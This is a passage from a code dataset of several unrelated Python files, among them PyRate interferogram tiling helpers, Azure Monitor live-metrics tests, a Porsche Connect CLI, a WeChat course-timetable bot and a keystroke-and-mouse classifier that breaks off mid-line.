\"physical\" layout of original array.\n\n The number of rows can be changed (increased) such that the resulting tiles\n with float32's do not exceed 500MB in memory.\n\n When the array shape (rows, columns) are not divisible by (nrows, ncols) then\n some of the array dimensions can change according to numpy.array_split.\n\n :param shape: Shape tuple of interferogram\n :param nrows: Number of rows of tiles\n :param ncols: Number of columns of tiles\n\n :return List of Tile class instances.\n \"\"\"\n\n if len(shape) != 2:\n raise ValueError('shape must be a length 2 tuple')\n\n no_y, no_x = shape\n\n if ncols > no_x or nrows > no_y:\n raise ValueError('nrows/cols must be greater than ifg dimensions')\n col_arr = np.array_split(range(no_x), ncols)\n row_arr = np.array_split(range(no_y), nrows)\n return [Tile(i, (r[0], c[0]), (r[-1]+1, c[-1]+1))\n for i, (r, c) in enumerate(product(row_arr, col_arr))]\n\n\nclass Tile:\n \"\"\"\n Tile class containing part of the interferograms.\n \"\"\"\n def __init__(self, index, top_left, bottom_right):\n \"\"\"\n :param index: Identifying index of a tile\n :param top_left: Interferogram index of top left of tile\n :param bottom_right: Interferogram index of bottom right of tile\n \"\"\"\n\n self.index = index\n self.top_left = top_left\n self.bottom_right = bottom_right\n self.top_left_y, self.top_left_x = top_left\n self.bottom_right_y, self.bottom_right_x = bottom_right\n\n def __str__(self):\n return \"Convenience Tile class containing tile co-ordinates\"\n\n\ndef copytree(src, dst, symlinks=False, ignore=None):\n # pylint: disable=line-too-long\n \"\"\"\n Copy contents of src dir into dst dir\n copied from: http://stackoverflow.com/questions/1868714/how-do-i-copy-an-entire-directory-of-files-into-an-existing-directory-using-pyth?lq=1\n \n :param src: Source directory to copy from\n :param dst: Destination directory to copy to, created if does not exist\n :param symlinks: Whether to copy symlink or not\n :param ignore: xxxx\n \"\"\"\n # pylint: disable=invalid-name\n if not os.path.exists(dst): # pragma: no cover\n os.makedirs(dst)\n shutil.copystat(src, dst)\n lst = os.listdir(src)\n if ignore:\n excl = ignore(src, lst)\n lst = [x for x in lst if x not in excl]\n for item in lst:\n s = os.path.join(src, item)\n d = os.path.join(dst, item)\n if symlinks and os.path.islink(s): # pragma: no cover\n if os.path.lexists(d):\n os.remove(d)\n os.symlink(os.readlink(s), d)\n try:\n st = os.lstat(s)\n mode = stat.S_IMODE(st.st_mode)\n os.lchmod(d, mode)\n except AttributeError:\n pass # lchmod not available\n elif os.path.isdir(s): # pragma: no cover\n copytree(s, d, symlinks, ignore)\n else:\n shutil.copy2(s, d)\n\n\ndef pre_prepare_ifgs(ifg_paths, params):\n \"\"\"\n xxxx\n\n :param ifg_paths: List of interferogram paths\n :param params: Parameters dictionary\n \n :return ifgs: List of interferogram instances\n \"\"\"\n ifgs = [Ifg(p) for p in ifg_paths]\n for i in ifgs:\n if not i.is_open:\n i.open(readonly=False)\n nan_and_mm_convert(i, params)\n log.info('Opened ifg for reading')\n return ifgs\n\n\ndef nan_and_mm_convert(ifg, params):\n \"\"\"\n xxxx\n \n :param ifg: Interferogram class instance\n :param params: Parameters dictionary\n \n :return xxxx\n \"\"\"\n nan_conversion = params[cf.NAN_CONVERSION]\n if nan_conversion: # nan conversion happens here in networkx mst\n # if not ifg.nan_converted:\n ifg.nodata_value = params[cf.NO_DATA_VALUE]\n ifg.convert_to_nans()\n if not ifg.mm_converted:\n ifg.convert_to_mm()\n\n\ndef cell_size(lat, lon, x_step, y_step):\n # pylint: disable=invalid-name\n \"\"\"\n Collection of geodesy/pyproj algorithms for PyRate.\n This function depends on PyProj/PROJ4 to implement the function\n llh2local.m used in Matlab Pirate.\n Converts X|Y_STEP in degrees to X & Y cell length/width in metres.\n \n :param lat: Latitude in degrees\n :param lon: Longitude in degrees\n :param x_step: Horizontal step size in degrees\n :param y_step: Vertical step size in degrees\n \n :return xxxx\n \"\"\"\n if lat > 84.0 or lat < -80:\n msg = \"No UTM zone for polar region: > 84 degrees N or < 80 degrees S\"\n raise ValueError(msg)\n\n zone = utm_zone(lon)\n p0 = pyproj.Proj(proj='latlong', ellps='WGS84')\n p1 = pyproj.Proj(proj='utm', zone=zone, ellps='WGS84')\n assert p0.is_latlong()\n assert not p1.is_latlong()\n\n x0, y0 = pyproj.transform(p0, p1, lon, lat)\n x1, y1 = pyproj.transform(p0, p1, lon + x_step, lat + y_step)\n return tuple(abs(e) for e in (x1 - x0, y1 - y0))\n\n\ndef utm_zone(longitude):\n \"\"\"\n Returns basic UTM zone for given longitude in degrees. Currently does NOT\n handle the sub-zoning around Scandanavian countries.\n See http://www.dmap.co.uk/utmworld.htm\n \n :param longitude: xxxxx\n \n :return xxxx\n \"\"\"\n if longitude == 180:\n return 60.0\n return floor((longitude + 180) / 6.0) + 1\n\n\nclass PrereadIfg:\n \"\"\"\n Convenience class for handling pre-calculated interferogram parameters.\n \"\"\"\n # pylint: disable=too-many-arguments\n # pylint: disable=too-many-instance-attributes\n def __init__(self, path, nan_fraction, master, slave, time_span,\n nrows, ncols, metadata):\n self.path = path\n self.nan_fraction = nan_fraction\n self.master = master\n self.slave = slave\n self.time_span = time_span\n self.nrows = nrows\n self.ncols = ncols\n self.shape = (nrows, ncols)\n self.metadata = metadata\n\n\ndef prepare_ifg(ifg_path, params):\n \"\"\"\n xxxx\n \n :param ifg_path: Interferogram path\n :param tiles: List of Tile instances\n :param params: Configuration dictionary\n \n :return ifg: Inteferogram class instance\n \"\"\"\n ifg = Ifg(ifg_path)\n ifg.open()\n nan_and_mm_convert(ifg, params)\n return ifg\n\n\ndef save_numpy_phase(ifg_paths, tiles, params):\n \"\"\"\n Save interferogram phase data as numpy array.\n\n :param ifg_paths: List of strings corresponding to interferogram paths\n :param tiles: List of Shared.Tile instances \n :param params: Configuration dictionary\n\n :return xxxx\n \"\"\"\n process_ifgs = mpiops.array_split(ifg_paths)\n outdir = params[cf.TMPDIR]\n if not os.path.exists(outdir):\n mkdir_p(outdir)\n for ifg_path in process_ifgs:\n ifg = Ifg(ifg_path)\n ifg.open()\n phase_data = ifg.phase_data\n bname = basename(ifg_path).split('.')[0]\n for t in tiles:\n p_data = phase_data[t.top_left_y:t.bottom_right_y,\n t.top_left_x:t.bottom_right_x]\n phase_file = 'phase_data_{}_{}.npy'.format(bname, t.index)\n np.save(file=join(outdir, phase_file),\n arr=p_data)\n ifg.close()\n mpiops.comm.barrier()\n\n\ndef get_projection_info(ifg_path):\n \"\"\"\n Return projection information of interferogram.\n\n :param ifg_path: Interferogram path\n \n :return xxxx\n \"\"\"\n ds = gdal.Open(ifg_path)\n md = ds.GetMetadata() # get metadata for writing on output tifs\n gt = ds.GetGeoTransform() # get geographical bounds of data\n wkt = ds.GetProjection() # get projection of data\n ds = None # close dataset\n return gt, md, wkt\n\n\ndef warp_required(xlooks, ylooks, crop):\n \"\"\"\n Returns True if params show rasters need to be cropped and/or resized.\n\n :param xlooks: Resampling/multi-looking in x dir\n :param ylooks: Resampling/multilooking in y dir\n :param crop: Interferogram crop option\n \n :return xxxx\n \"\"\"\n\n if xlooks > 1 or ylooks > 1:\n return True\n\n if crop is None:\n return False\n\n return True\n\n\ndef output_tiff_filename(inpath, outpath):\n \"\"\"\n Return the geotiff filename for a given input filename.\n \n :param inpath: path of input file location\n :param outpath: path of output file location\n \n :return: Geotiff filename for a given file.\n \"\"\"\n fname, ext = os.path.basename(inpath).split('.')\n return os.path.join(outpath, fname + '_' + ext + '.tif')\n","sub_path":"pyrate/shared.py","file_name":"shared.py","file_ext":"py","file_size_in_byte":34276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"275859405","text":"'''7.Write a program to accept a number from the user and determine the sum of digits of that number. Repeat the operation until the sum gets to be a single digit number.'''\n\nsum = 0\ncount = 0\ndef find_sum(num):\n sum = 0\n while num > 0 or sum > 9:\n if num == 0:\n num = sum \n sum = 0\n sum += num % 10\n num = num // 10\n return sum\nnum = int(input(\"enter the number:\"))\nres = find_sum(num)\nprint(res)\n","sub_path":"M1_q/sum2.py","file_name":"sum2.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"519785037","text":"while True:\n item = self.findNearest(self.findItems())\n if (item):\n if (self.isReady(\"jump\")):\n self.jumpTo({'x': item.pos.x, 'y': item.pos.y})\n else:\n self.move(item.pos)\n if self.gold > self.costOf(\"soldier\"):\n self.summon(\"soldier\")\n enemy = self.findNearest(self.findEnemies())\n if enemy:\n soldiers = self.findFriends()\n soldierIndex = 0\n while (soldierIndex < len(soldiers)):\n soldier = soldiers[soldierIndex]\n self.command(soldier, \"attack\", enemy)\n soldierIndex += 1\n","sub_path":"Mountain/CloudripBrawl/CloudripBrawl.py","file_name":"CloudripBrawl.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"638789048","text":"import math\n\ndef circle_calc(radius):\n area = math.pi * (radius**2)\n cic = 2*math.pi*radius\n diamet = 2*radius\n return round(area,2), round(cic,2), diamet\n\ndef main():\n in_radius = float(input(\"Enter radius : \"))\n results = circle_calc(in_radius)\n print(f'Area : {results[0]}, Circumference : {results[1]}, Diameter: {results[2]}')\n\nif __name__ == '__main__':\n main()\n","sub_path":"CicleCalc.py","file_name":"CicleCalc.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"486099101","text":"# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License.\n\nimport time\nimport unittest\nfrom unittest import mock\n\nfrom opentelemetry import metrics\nfrom opentelemetry.sdk.metrics import Counter, MeterProvider\n\nfrom azure_monitor.sdk.auto_collection.live_metrics.exporter import (\n LiveMetricsExporter,\n)\nfrom azure_monitor.sdk.auto_collection.live_metrics.manager import (\n LiveMetricsManager,\n LiveMetricsPing,\n LiveMetricsPost,\n)\nfrom azure_monitor.sdk.auto_collection.metrics_span_processor import (\n AzureMetricsSpanProcessor,\n)\n\n\n# pylint: disable=protected-access\nclass TestLiveMetricsManager(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n metrics.set_meter_provider(MeterProvider())\n cls._meter = metrics.get_meter(__name__)\n cls._test_metric = cls._meter.create_metric(\n \"testname\", \"testdesc\", \"unit\", int, Counter, [\"environment\"]\n )\n testing_labels = {\"environment\": \"testing\"}\n cls._test_metric.add(5, testing_labels)\n cls._instrumentation_key = \"99c42f65-1656-4c41-afde-bd86b709a4a7\"\n cls._manager = None\n cls._ping = None\n cls._post = None\n cls._span_processor = AzureMetricsSpanProcessor()\n\n @classmethod\n def tearDownClass(cls):\n metrics._METER_PROVIDER = None\n\n def tearDown(self):\n if self._manager:\n self._manager.shutdown()\n self._manager = None\n if self._ping:\n self._ping.shutdown()\n self._ping = None\n if self._post:\n self._post.shutdown()\n self._post = None\n\n def test_constructor(self):\n \"\"\"Test the constructor.\"\"\"\n with mock.patch(\"requests.post\"):\n self._manager = LiveMetricsManager(\n meter=self._meter,\n instrumentation_key=self._instrumentation_key,\n span_processor=self._span_processor,\n )\n self.assertFalse(self._manager._is_user_subscribed)\n self.assertEqual(\n self._manager._instrumentation_key, self._instrumentation_key\n )\n self.assertEqual(self._manager._meter, self._meter)\n self.assertIsNotNone(self._manager._ping)\n\n def test_switch(self):\n \"\"\"Test manager switch between ping and post.\"\"\"\n with mock.patch(\"requests.post\") as request:\n request.return_value = MockResponse(\n 200, None, {\"x-ms-qps-subscribed\": \"true\"}\n )\n self._manager = LiveMetricsManager(\n meter=self._meter,\n instrumentation_key=self._instrumentation_key,\n span_processor=self._span_processor,\n )\n self._manager.interval = 60\n time.sleep(1)\n self._manager.check_if_user_is_subscribed()\n self.assertIsNone(self._manager._ping)\n self.assertIsNotNone(self._manager._post)\n self.assertEqual(\n self._manager._span_processor.is_collecting_documents, True\n )\n self._manager._post.is_user_subscribed = False\n self._manager.check_if_user_is_subscribed()\n self.assertIsNone(self._manager._post)\n self.assertIsNotNone(self._manager._ping)\n self.assertEqual(\n self._manager._span_processor.is_collecting_documents, False\n )\n\n def test_ping_ok(self):\n \"\"\"Test ping send requests to Live Metrics service.\"\"\"\n with mock.patch(\"requests.post\") as request:\n request.return_value = MockResponse(200, None, {})\n self._ping = LiveMetricsPing(\n instrumentation_key=self._instrumentation_key\n )\n self._ping.ping()\n self.assertTrue(request.called)\n self.assertTrue(self._ping.last_request_success_time > 0)\n self.assertTrue(self._ping.last_send_succeeded)\n self.assertFalse(self._ping.is_user_subscribed)\n\n def test_ping_subscribed(self):\n \"\"\"Test ping when user is subscribed.\"\"\"\n with mock.patch(\"requests.post\") as request:\n request.return_value = MockResponse(\n 200, None, {\"x-ms-qps-subscribed\": \"true\"}\n )\n self._ping = LiveMetricsPing(\n instrumentation_key=self._instrumentation_key\n )\n self._ping.ping()\n self.assertTrue(self._ping.is_user_subscribed)\n\n def test_ping_error(self):\n \"\"\"Test ping when failure.\"\"\"\n with mock.patch(\"requests.post\") as request:\n request.return_value = MockResponse(400, None, {})\n self._ping = LiveMetricsPing(\n instrumentation_key=self._instrumentation_key\n )\n self._ping.last_request_success_time = time.time() - 60\n self._ping.ping()\n self.assertFalse(self._ping.last_send_succeeded)\n self.assertEqual(self._ping.interval, 60)\n\n def test_post_ok(self):\n \"\"\"Test post send requests to Live Metrics service.\"\"\"\n with mock.patch(\"requests.post\") as request:\n request.return_value = MockResponse(\n 200, None, {\"x-ms-qps-subscribed\": \"false\"}\n )\n self._post = LiveMetricsPost(\n exporter=LiveMetricsExporter(\n self._instrumentation_key,\n span_processor=self._span_processor,\n ),\n meter=self._meter,\n instrumentation_key=self._instrumentation_key,\n )\n self._post.post()\n self.assertTrue(request.called)\n self.assertTrue(self._post.last_request_success_time > 0)\n self.assertTrue(self._post.last_send_succeeded)\n self.assertFalse(self._post.is_user_subscribed)\n\n def test_post_subscribed(self):\n \"\"\"Test post when user is subscribed.\"\"\"\n with mock.patch(\"requests.post\") as request:\n request.return_value = MockResponse(\n 200, None, {\"x-ms-qps-subscribed\": \"true\"}\n )\n self._post = LiveMetricsPost(\n exporter=LiveMetricsExporter(\n self._instrumentation_key,\n span_processor=self._span_processor,\n ),\n meter=self._meter,\n instrumentation_key=self._instrumentation_key,\n )\n self._post.post()\n self.assertTrue(self._post.is_user_subscribed)\n\n def test_post_error(self):\n \"\"\"Test post when failure.\"\"\"\n with mock.patch(\"requests.post\") as request:\n request.return_value = MockResponse(400, None, {})\n self._post = LiveMetricsPost(\n exporter=LiveMetricsExporter(\n self._instrumentation_key,\n span_processor=self._span_processor,\n ),\n meter=self._meter,\n instrumentation_key=self._instrumentation_key,\n )\n self._post.last_request_success_time = time.time() - 61\n self._post.post()\n self.assertFalse(self._post.last_send_succeeded)\n self.assertEqual(self._post.interval, 60)\n\n\n# pylint: disable=invalid-name\nclass MockResponse:\n def __init__(self, status_code, text, headers):\n self.status_code = status_code\n self.text = text\n self.ok = status_code == 200\n self.headers = headers\n","sub_path":"azure_monitor/tests/auto_collection/live_metrics/test_manager.py","file_name":"test_manager.py","file_ext":"py","file_size_in_byte":7491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"301835731","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Jie Wang @ 2021-02-23\nimport base64\nimport librosa\nimport soundfile as sf\nimport os\nfrom math import *\n\n\n# wav_path = '/Users/wangjie/Downloads/corpus/nus-smc-corpus_48/ADIZ/sing/18.wav'\n# rootDir = '/Users/wangjie/Downloads/corpus/nus-smc-corpus_48'\nrootDir = '/workspace/project-nas-10801-sh/datasets/nus_16k'\n# targetDir = '/Users/wangjie/Downloads/corpus/nus-smc-corpus_48/five_second'\ntargetDir = '/workspace/project-nas-10801-sh/datasets/five_seconds'\ndirName, subdirList, _ = next(os.walk(rootDir))\nfor subdir in sorted(subdirList): # 说话人list\n # print(subdir)\n if not os.path.exists(os.path.join(targetDir, subdir)):\n os.makedirs(os.path.join(targetDir, subdir))\n \n _, _, fileList = next(os.walk(os.path.join(dirName, subdir)))\n for fileName in sorted(fileList):\n # print(fileName)\n # x, fs = sf.read(os.path.join(dirName,subdir,fileName))\n wav_path = os.path.join(dirName,subdir,fileName)\n data, samplerate = librosa.load(wav_path, sr=16000)\n duration = len(data) / samplerate # 单位是s\n print(duration)\n segments = floor(duration / 5)\n print(segments)\n for i in range(1, segments + 1):\n print(i)\n if i * 5 >= duration:\n y = data[ (i - 1) * 80000 :]\n else: \n y = data[(i - 1) * 80000: i * 80000]\n print(y)\n nn = fileName[:-4] + '_' + str(i)\n # librosa.output.write_wav('results/' + nn + '.wav', waveform_NOP, sr=16000)\n save_path = os.path.join(targetDir, subdir) \n sf.write(os.path.join(save_path, f\"{nn}.wav\"), y, 16000, \"PCM_16\")\n# print(duration)\n# for i in range():\n # y = data[i : i + 80000]\n# y = data[:80000]\n# i = 19\n# nn = '18' + '_' + str(i)\n# sf.write(os.path.join('results/', f\"{nn}.wav\"), y, 16000, \"PCM_16\")\n\n\n# print(data, samplerate, '{:.2f}s'.format(duration))\n# with open(wav_path, 'rb') as f:\n# buff = f.read()\n# buff = buff[:78] + buff[64000:]\n# # buff = buff[:32078] #将音频切分为你想要的长度,这里是1s(需包含RIFF头)\n# buff_str = base64.b64encode(buff).decode()\n# print(type(buff_str))\n# buff = base64.b64decode(buff_str)\n# data, samplerate = librosa.load(io.BytesIO(buff), sr=16000)\n# print(len(data)) # 这个例子里是 1s, 即为16000\n# duration = len(data) / samplerate\n# print(data, samplerate, '{:.2f}s'.format(duration))\n\n\n","sub_path":"batch_crop.py","file_name":"batch_crop.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"435239741","text":"import argparse\nimport asyncio\nfrom pyporscheconnectapi.connection import Connection\nfrom pyporscheconnectapi.client import Client\nimport sys\nimport logging\nimport json\n\nlogging.basicConfig()\nlogging.root.setLevel(logging.WARNING)\n\n\nasync def main(args):\n try:\n with open(args.session_file) as json_file:\n tokens = json.load(json_file)\n except FileNotFoundError:\n tokens = {}\n except json.decoder.JSONDecodeError:\n tokens = {}\n\n conn = Connection(args.email, args.password, tokens=tokens, country=args.country, language=args.language)\n client = Client(conn)\n\n if args.command == \"list\":\n data = await client.getVehicles()\n print(json.dumps(data, indent=2))\n else:\n vins = []\n if args.vin is not None: vins = [ args.vin ]\n elif args.all:\n vehicles = await client.getVehicles()\n vins = map(lambda v : v['vin'], vehicles)\n else:\n sys.exit(\"--vin or --all is required\")\n for vin in vins:\n data = {}\n if args.command == \"overview\":\n data = await client.getOverview(vin)\n elif args.command == \"maintenance\":\n data = await client.getMaintenance(vin)\n elif args.command == \"summary\":\n data = await client.getSummary(vin)\n elif args.command == \"capabilities\":\n data = await client.getCapabilities(vin)\n elif args.command == \"position\":\n data = await client.getPosition(vin)\n elif args.command == \"emobility\":\n data = await client.getEmobility(vin, model=args.model, country=args.country, language=args.language, timezone=args.timezone)\n elif args.command == \"triplongterm\":\n data = await client.getTripLongTerm(vin, country=args.country, language=args.language)\n elif args.command == \"tripshortterm\":\n data = await client.getTripShortTerm(vin, country=args.country, language=args.language)\n elif args.command == \"speedalerts\":\n data = await client.getSpeedAlerts(vin, country=args.country, language=args.language)\n elif args.command == \"theftalerts\":\n data = await client.getTheftAlerts(vin)\n print(json.dumps(data, indent=2))\n\n\n await conn.close()\n with open(args.session_file, 'w', encoding='utf-8') as json_file:\n json.dump(conn.tokens, json_file, ensure_ascii=False, indent=2)\n\ndef cli():\n parser = argparse.ArgumentParser(description='Porsche Connect CLI.')\n parser.add_argument('command', choices=['list', 'overview', 'maintenance', 'summary', 'capabilities', 'emobility',\n 'position', 'triplongterm', 'tripshortterm', 'speedalerts', 'theftalerts'])\n parser.add_argument('-e', '--email', dest='email', required=True)\n parser.add_argument('-p', '--password', dest='password', required=True)\n parser.add_argument('-s', '--sessionfile', dest='session_file', default='.session')\n parser.add_argument('-v', '--vin', dest='vin', default=None)\n parser.add_argument('-m', '--model', dest='model', default=None)\n parser.add_argument('-a', '--all', dest='all', action='store_true')\n parser.add_argument('-c', '--country', dest='country', default='de')\n parser.add_argument('-l', '--language', dest='language', default='DE')\n parser.add_argument('-z', '--timezone', dest='timezone', default='Europe/Stockholm')\n\n args = parser.parse_args()\n\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main(args))\n","sub_path":"pyporscheconnectapi/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"533546874","text":"__author__ = 'Hex'\n# encoding: utf-8\nfrom models import WxUser,WxKcb,WxXfb\nimport gkdgrab\nimport course\nimport datetime\n\ndef validateWxUser(Wxid):\n #返回数据库中已有的保存的这个微信号个数(理论上不是0就是1)\n return len(WxUser.objects.filter(wxid=Wxid))\n\ndef validateWxKcb(idkey):\n #返回数据库中已有的保存的这个微信的课表数(理论上不是0就是1)\n return len(WxKcb.objects.filter(wxuserId=idkey))\n\ndef validateWxXfb(idkey):\n #返回数据库中已有的保存的这个微信的学分表数(理论上不是0就是1)\n return len(WxXfb.objects.filter(wxuserId=idkey))\n\ndef addWxUser(wxid,name,pwd):\n #向数据库中添加新的user信息\n if validateWxUser(wxid)==0:\n newUser=WxUser(wxid=wxid,username=name,password=pwd)\n newUser.save()\n\ndef deleteWxUser(wxid):\n #向数据库中删除当前user信息,要求传入的wxid必须为string\n if validateWxUser(wxid)!=0:\n newUser=WxUser.objects.get(wxid=wxid)\n newUser.delete()\n\ndef initWxUser(wxid):\n #重置用户密码为123456\n if validateWxUser(wxid)!=0:\n newUser=WxUser.objects.get(wxid=wxid)\n newUser.password='123456'\n newUser.save()\n\ndef updateWxUser(wxid,name,pwd):\n #向数据库中更新user信息\n if validateWxUser(wxid)==1:\n newUser=WxUser.objects.get(wxid=wxid)\n newUser.username=name\n newUser.password=pwd\n newUser.save()\n\ndef UpdateClasses(wxid):\n if validateWxUser(wxid)!=0:\n newUser=WxUser.objects.get(wxid=wxid)\n name=newUser.username\n pwd=newUser.password\n #更新课表信息,包括初次创建\n kcinfo=gkdgrab.gkdgrap_kcb(name,pwd)\n if kcinfo[0]=='error':\n return u'对不起,您绑定的账号信息有误,建议您通过发送格式为 add [空格]邮箱名[空格]密码 的消息来更新您的绑定信息!'\n #return 'error'\n else:\n result=gkdgrab.gkdgrab_kcbparse(kcinfo[0])\n xf=gkdgrab.gkdgrab_xfparse(kcinfo[1])#处理获取到的学分表信息\n #weekNum=datetime.date.today().weekday()+2\n\n i=1\n idkey=WxUser.objects.get(wxid=wxid).id\n\n if validateWxXfb(idkey)==0:\n #创建新的学分表\n newXfb=WxXfb(wxuserId=WxUser.objects.get(wxid=wxid))\n newXfb.save()\n newXfb=WxXfb.objects.get(wxuserId=WxUser.objects.get(wxid=wxid))\n newXfb.yqgx=xf['yqgx']\n newXfb.yqzb=xf['yqzb']\n newXfb.yqzx=xf['yqzx']\n newXfb.yqzf=xf['yqzf']\n newXfb.yxgx=xf['yxgx']\n newXfb.yxzb=xf['yxzb']\n newXfb.yxzx=xf['yxzx']\n newXfb.yxzf=xf['yxzf']\n newXfb.hdgx=xf['hdgx']\n newXfb.hdzb=xf['hdzb']\n newXfb.hdzx=xf['hdzx']\n newXfb.hdzf=xf['hdzf']\n newXfb.save()\n\n\n if validateWxKcb(idkey)==0:\n #创建新的课表\n newKcb=WxKcb(wxuserId=WxUser.objects.get(wxid=wxid))\n newKcb.save()\n newKcb=WxKcb.objects.get(wxuserId=WxUser.objects.get(wxid=wxid))\n #testss=''\n while i<8:#周几\n cla={}\n respon=\"\"\"您的课程安排如下:\n\"\"\"\n for toco in result:\n if toco.day==i:#当天\n\n cla[toco.period]=toco.name+\"\"\"\n 【\"\"\"+toco.classroom+\"】\"\n\n if cla.has_key(1):\n respon=respon+\"\"\"第1节8:30\"\"\"+cla[1]+\"\"\"\n\"\"\"\n if cla.has_key(2):\n respon=respon+\"\"\"第2节9:20\"\"\"+cla[2]+\"\"\"\n\"\"\"\n if cla.has_key(3):\n respon=respon+\"\"\"第3节10:30\"\"\"+cla[3]+\"\"\"\n\"\"\"\n if cla.has_key(4):\n respon=respon+\"\"\"第4节11:20\"\"\"+cla[4]+\"\"\"\n\"\"\"\n if cla.has_key(5):\n respon=respon+\"\"\"第5节13:30\"\"\"+cla[5]+\"\"\"\n\"\"\"\n if cla.has_key(6):\n respon=respon+\"\"\"第6节14:20\"\"\"+cla[6]+\"\"\"\n\"\"\"\n if cla.has_key(7):\n respon=respon+\"\"\"第7节15:20\"\"\"+cla[7]+\"\"\"\n\"\"\"\n if cla.has_key(8):\n respon=respon+\"\"\"第8节16:10\"\"\"+cla[8]+\"\"\"\n\"\"\"\n if cla.has_key(9):\n respon=respon+\"\"\"第9节19:00\"\"\"+cla[9]+\"\"\"\n\"\"\"\n if cla.has_key(10):\n respon=respon+\"\"\"第10节19:50\"\"\"+cla[10]+\"\"\"\n\"\"\"\n if cla.has_key(11):\n respon=respon+\"\"\"第11节20:50\"\"\"+cla[11]+\"\"\"\n\"\"\"\n res=respon\n #testss=testss+res\n\n if i==1:\n newKcb.z1=res\n elif i==2:\n newKcb.z2=res\n elif i==3:\n newKcb.z3=res\n elif i==4:\n newKcb.z4=res\n elif i==5:\n newKcb.z5=res\n elif i==6:\n newKcb.z6=res\n elif i==7:\n newKcb.z7=res\n\n\n newKcb.save()\n\n i=i+1\n #return 'success'\n return '恭喜您,导入课表成功!对于您在课程网站的一切信息都属于您的个人隐私,请相信小助手是不会去查看的。同时也建议您设置与其他常用网站不同的课程网站密码,尽管小助手也不会去尝试获取或者记住它。谢谢您的使用!'\n else:\n return '您可能还没有绑定账号信息,请按照如下格式回复进行绑定:add[空格]课程网站登录邮箱[空格]密码'\n\n\ndef todayClasses(wxid):\n if validateWxUser(wxid)==0:\n return u\"很抱歉,您还没有注册您的个人信息!请按照如下格式回复您的课程网站邮箱以及密码:add[空格]课程网站登录邮箱[空格]密码\"\n if len(WxKcb.objects.filter(wxuserId=WxUser.objects.get(wxid=wxid)))==0:\n return u\"很抱歉,您可能需要更新您的课程表信息,请回复如下单词:update\"\n wxkcb=WxKcb.objects.get(wxuserId=WxUser.objects.get(wxid=wxid))\n weekNum=datetime.date.today().weekday()+1\n if weekNum==1:\n return wxkcb.z1\n if weekNum==2:\n return wxkcb.z2\n if weekNum==3:\n return wxkcb.z3\n if weekNum==4:\n return wxkcb.z4\n if weekNum==5:\n return wxkcb.z5\n if weekNum==6:\n return wxkcb.z6\n if weekNum==7:\n return wxkcb.z7\n\n\ndef tomorrowClasses(wxid):\n if validateWxUser(wxid)==0:\n return u\"很抱歉,您还没有注册您的个人信息!请按照如下格式回复您的课程网站邮箱以及密码:add[空格]课程网站登录邮箱[空格]密码\"\n if len(WxKcb.objects.filter(wxuserId=WxUser.objects.get(wxid=wxid)))==0:\n return u\"很抱歉,您可能需要更新您的课程表信息,请回复如下单词:update\"\n wxkcb=WxKcb.objects.get(wxuserId=WxUser.objects.get(wxid=wxid))\n weekNum=datetime.date.today().weekday()+1\n if weekNum==1:\n return wxkcb.z2\n if weekNum==2:\n return wxkcb.z3\n if weekNum==3:\n return wxkcb.z4\n if weekNum==4:\n return wxkcb.z5\n if weekNum==5:\n return wxkcb.z6\n if weekNum==6:\n return wxkcb.z7\n if weekNum==7:\n return wxkcb.z1\n\n\ndef nowXuefen(wxid):\n if validateWxUser(wxid)==0:\n return u\"很抱歉,您还没有注册您的个人信息!请按照如下格式回复您的课程网站邮箱以及密码:add[空格]课程网站登录邮箱[空格]密码\"\n if len(WxXfb.objects.filter(wxuserId=WxUser.objects.get(wxid=wxid)))==0:\n return u\"很抱歉,您可能需要更新您的学分表信息,请回复如下单词:update\"\n wxfb=WxXfb.objects.get(wxuserId=WxUser.objects.get(wxid=wxid))\n res=u\"您好,您的学分情况如下,毕业要求的总学分为:%s,已选%s(包括未出成绩),已修%s;要求的公选为:%s,已选%s,已修%s;要求的专业必修为:%s,已选%s,已修%s;要求的专业选修为:%s,已选%s,已修%s.公共必修未显示,此信息仅供参考,不代表其具有准确性,具体以教务系统为准。\"\n res=res%(wxfb.yqzf,wxfb.yxzf,wxfb.hdzf,wxfb.yqgx,wxfb.yxgx,wxfb.hdgx,wxfb.yqzb,wxfb.yxzb,wxfb.hdzb,wxfb.yqzx,wxfb.yxzx,wxfb.hdzx)\n return res\n\n\n\n\n\n\n\n","sub_path":"wxgkd/kcb/kcbfunc.py","file_name":"kcbfunc.py","file_ext":"py","file_size_in_byte":8350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"259939881","text":"import pandas as pd\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom xgboost import XGBClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score, precision_score,recall_score,f1_score\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport pickle\nfrom sklearn.neighbors import KNeighborsClassifier\n\n# from sklearn.svm import SVC\n\nkeyboard = pd.read_csv(\"/home/senthuran/Desktop/Movies/MouseKey.csv\")\nprint(keyboard.shape)\nprint(keyboard.head())\nX = keyboard.drop('username', axis=1)\ny = keyboard['username']\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.20)\n\nmodel = OneVsRestClassifier(KNeighborsClassifier())\nmodel.fit(X_train, y_train)\n\n# save the model to disk\nfilename = 'MouseKey1.sav'\npickle.dump(model, open(filename, 'wb'))\n\nnew_input= pd.DataFrame({\"maxPositiveAcc\":[7247], \"maxNegativeAcc\":[-8857], \"maxSpeed\":[886], 